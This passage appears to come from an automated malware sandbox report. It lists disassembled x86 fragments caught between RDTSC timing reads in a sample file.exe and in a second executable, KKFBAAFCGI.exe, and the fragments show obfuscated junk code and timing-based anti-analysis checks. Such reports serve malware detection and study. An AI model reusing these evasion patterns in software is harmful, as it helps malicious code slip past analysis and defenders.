Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90778 second address: 4E907EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA32872BAEFh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov al, byte ptr [edi+01h] 0x0000000e pushad 0x0000000f mov bx, 7636h 0x00000013 pushfd 0x00000014 jmp 00007FA32872BAF7h 0x00000019 add ch, FFFFFFBEh 0x0000001c jmp 00007FA32872BAF9h 0x00000021 popfd 0x00000022 popad 0x00000023 inc edi 0x00000024 jmp 00007FA32872BAEEh 0x00000029 test al, al 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FA32872BAEAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E907EA second address: 4E907F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E907F9 second address: 4E908BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA32872BAEFh 0x00000009 adc ecx, 39FE7E2Eh 0x0000000f jmp 00007FA32872BAF9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA32872BAF0h 0x0000001b adc al, FFFFFFA8h 0x0000001e jmp 00007FA32872BAEBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 jne 00007FA399AC3D16h 0x0000002d jmp 00007FA32872BAF6h 0x00000032 mov ecx, edx 0x00000034 jmp 00007FA32872BAF0h 0x00000039 shr ecx, 02h 0x0000003c jmp 00007FA32872BAF0h 0x00000041 rep movsd 0x00000043 rep movsd 0x00000045 rep movsd 0x00000047 rep movsd 0x00000049 rep movsd 0x0000004b jmp 00007FA32872BAF0h 0x00000050 mov ecx, edx 0x00000052 jmp 00007FA32872BAF0h 0x00000057 and ecx, 03h 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E908BC second address: 4E908D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FA328DF73B3h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E908D5 second address: 4E908EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA32872BAF5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E908EE second address: 4E9090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rep movsb 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9090D second address: 4E90913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90913 second address: 4E9092A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, A3h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9092A second address: 4E9092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9092E second address: 4E90932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90932 second address: 4E90938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90938 second address: 4E9096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, FCh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, ebx 0x0000000a jmp 00007FA328DF73B1h 0x0000000f mov ecx, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 movsx edx, cx 0x00000019 popad 0x0000001a mov dword ptr fs:[00000000h], ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9096B second address: 4E90988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90988 second address: 4E909DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FA328DF73ADh 0x0000000b sub al, FFFFFFC6h 0x0000000e jmp 00007FA328DF73B1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ecx 0x00000018 jmp 00007FA328DF73AEh 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA328DF73B7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E909DC second address: 4E90505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 57h 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007FA32872BAEAh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA32872BAEEh 0x00000018 sub cx, F828h 0x0000001d jmp 00007FA32872BAEBh 0x00000022 popfd 0x00000023 popad 0x00000024 leave 0x00000025 jmp 00007FA32872BAF5h 0x0000002a retn 0008h 0x0000002d cmp dword ptr [ebp-2Ch], 10h 0x00000031 mov eax, dword ptr [ebp-40h] 0x00000034 jnc 00007FA32872BAE5h 0x00000036 push eax 0x00000037 lea edx, dword ptr [ebp-00000590h] 0x0000003d push edx 0x0000003e call esi 0x00000040 push 00000008h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 call 00007FA32872BAEDh 0x0000004a pop esi 0x0000004b pushfd 0x0000004c jmp 00007FA32872BAF1h 0x00000051 jmp 00007FA32872BAEBh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90AD2 second address: 4E90AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90AD6 second address: 4E90ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90ADC second address: 4E90B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov cl, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA328DF73B4h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov edi, 5FDC2974h 0x00000018 mov eax, ebx 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FA328DF73B5h 0x00000023 or ecx, 66CB79E6h 0x00000029 jmp 00007FA328DF73B1h 0x0000002e popfd 0x0000002f push esi 0x00000030 mov ecx, ebx 0x00000032 pop ebx 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007FA328DF73B6h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA328DF73B7h 0x00000043 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 50F52D second address: 50F54B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68D7DE second address: 68D7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68D936 second address: 68D94E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA32872BAF2h 0x0000000c jng 00007FA32872BAE6h 0x00000012 js 00007FA32872BAE6h 0x00000018 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68D94E second address: 68D956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68D956 second address: 68D95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68D95A second address: 68D960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DC29 second address: 68DC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DC33 second address: 68DC4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA328DF73ABh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA328DF73A6h 0x00000013 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DDC6 second address: 68DDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jc 00007FA32872BAE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DDD4 second address: 68DE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA328DF73B6h 0x0000000a jmp 00007FA328DF73B0h 0x0000000f jmp 00007FA328DF73B8h 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007FA328DF73AEh 0x0000001c push edx 0x0000001d jo 00007FA328DF73A6h 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DE33 second address: 68DE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DF92 second address: 68DF98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 68DF98 second address: 68DFB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FA32872BAEDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jp 00007FA32872BAE6h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690B90 second address: 690BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA328DF73B3h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690BE3 second address: 690C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+122D1DCBh] 0x0000000e push 00000000h 0x00000010 mov edi, dword ptr [ebp+122D3BEDh] 0x00000016 push D0828BDBh 0x0000001b push ebx 0x0000001c pushad 0x0000001d jmp 00007FA32872BAF6h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pop ebx 0x00000026 add dword ptr [esp], 2F7D74A5h 0x0000002d mov dword ptr [ebp+122D2BF7h], esi 0x00000033 jmp 00007FA32872BAEBh 0x00000038 push 00000003h 0x0000003a jnc 00007FA32872BAEBh 0x00000040 mov edi, 6C3B368Fh 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007FA32872BAE8h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 0000001Dh 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 jnp 00007FA32872BAEBh 0x00000067 push 00000003h 0x00000069 mov cx, dx 0x0000006c push B10A451Eh 0x00000071 push ecx 0x00000072 pushad 0x00000073 push esi 0x00000074 pop esi 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690DDD second address: 690DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690DE3 second address: 690E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA32872BAEFh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edi 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop edi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FA32872BAE8h 0x0000001f rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690EAB second address: 690F18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA328DF73B2h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f mov edx, dword ptr [ebp+122D3B65h] 0x00000015 pop ecx 0x00000016 push 00000000h 0x00000018 add dword ptr [ebp+122D38B5h], edx 0x0000001e call 00007FA328DF73A9h 0x00000023 push edx 0x00000024 jc 00007FA328DF73B6h 0x0000002a jmp 00007FA328DF73B0h 0x0000002f pop edx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jp 00007FA328DF73A6h 0x0000003a jmp 00007FA328DF73B6h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690F18 second address: 690F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690F39 second address: 690F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 690F3D second address: 691003 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edi 0x0000000e push edx 0x0000000f jmp 00007FA32872BAF4h 0x00000014 pop edx 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FA32872BAF6h 0x0000001f pop eax 0x00000020 jmp 00007FA32872BAEFh 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FA32872BAE8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 stc 0x00000042 push 00000000h 0x00000044 mov edx, dword ptr [ebp+122D3A7Dh] 0x0000004a push 00000003h 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007FA32872BAE8h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov esi, dword ptr [ebp+122D3A59h] 0x0000006c push EA8ED4B6h 0x00000071 push eax 0x00000072 push edx 0x00000073 js 00007FA32872BAFCh 0x00000079 jmp 00007FA32872BAF6h 0x0000007e rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 691003 second address: 691066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2A8ED4B6h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FA328DF73A8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a and ch, 00000073h 0x0000002d xor ecx, dword ptr [ebp+122D3B61h] 0x00000033 lea ebx, dword ptr [ebp+12455AEAh] 0x00000039 add dx, 0693h 0x0000003e push eax 0x0000003f push eax 0x00000040 jo 00007FA328DF73ACh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B196C second address: 6B198B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA32872BAF8h 0x0000000c rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B198B second address: 6B19A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA328DF73B6h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B19A5 second address: 6B19B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FA32872BB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B19B7 second address: 6B19CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73B0h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B19CB second address: 6B19D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6AFAB7 second address: 6AFACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73B0h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6AFACB second address: 6AFACF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6AFF1C second address: 6AFF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6AFF24 second address: 6AFF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B01EF second address: 6B01FB instructions: 0x00000000 rdtsc 0x00000002 je 00007FA328DF73A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B01FB second address: 6B0200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B0200 second address: 6B021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA328DF73A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B021D second address: 6B0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B0221 second address: 6B0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B0227 second address: 6B022E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B022E second address: 6B0236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B03D2 second address: 6B03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B03DB second address: 6B03E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA328DF73A6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B03E5 second address: 6B03EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B06DC second address: 6B06E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B06E0 second address: 6B06E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B06E6 second address: 6B06EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B06EC second address: 6B06F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67927D second address: 679287 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA328DF73ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B123B second address: 6B1240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B13C6 second address: 6B13DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ADh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B13DB second address: 6B13E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B1510 second address: 6B153A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA328DF73B9h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B153A second address: 6B153F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B153F second address: 6B156C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73AFh 0x00000009 jmp 00007FA328DF73B8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B156C second address: 6B1579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FA32872BAE6h 0x0000000d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B275D second address: 6B276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73ABh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B73B6 second address: 6B73E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA32872BAECh 0x00000008 je 00007FA32872BAEEh 0x0000000e jbe 00007FA32872BAE6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b jne 00007FA32872BAE6h 0x00000021 jnp 00007FA32872BAE6h 0x00000027 pop edi 0x00000028 rdtsc
